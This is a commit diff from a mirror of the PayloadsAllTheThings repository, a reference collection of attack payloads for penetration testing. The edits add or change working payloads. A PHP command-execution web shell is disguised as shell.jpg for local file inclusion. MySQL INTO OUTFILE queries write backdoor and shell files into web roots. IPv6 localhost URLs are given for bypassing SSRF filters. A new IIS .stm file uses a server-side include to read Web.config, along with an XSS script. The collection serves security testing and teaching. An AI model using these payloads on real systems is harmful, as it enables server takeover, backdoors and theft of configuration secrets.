mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 20:36:12 +00:00
MySQL - Code exec
This commit is contained in:
parent
edd5f3601f
commit
f740d8e825
@ -72,7 +72,7 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod
|
||||
|
||||
LFI Wrapper ZIP
|
||||
```python
|
||||
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
||||
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
||||
zip payload.zip payload.php;
|
||||
mv payload.zip shell.jpg;
|
||||
rm payload.php
|
||||
|
@ -73,4 +73,5 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||
```
|
||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
||||
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
||||
```
|
||||
|
@ -43,6 +43,14 @@ http://[::]:22/ SSH
|
||||
http://[::]:3128/ Squid
|
||||
```
|
||||
|
||||
```
|
||||
http://0000::1:80/
|
||||
http://0000::1:25/ SMTP
|
||||
http://0000::1:22/ SSH
|
||||
http://0000::1:3128/ Squid
|
||||
```
|
||||
|
||||
|
||||
Bypass localhost with a domain redirecting to locahost
|
||||
```
|
||||
http://n-pn.info
|
||||
|
14
Upload insecure files/IIS/index.stm
Normal file
14
Upload insecure files/IIS/index.stm
Normal file
@ -0,0 +1,14 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<meta charset="utf-8" />
|
||||
<title></title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<!-- #include file = "Web.config" -->
|
||||
<script>alert('XSS')</script>
|
||||
</body>
|
||||
|
||||
</html>
|
Loading…
Reference in New Issue
Block a user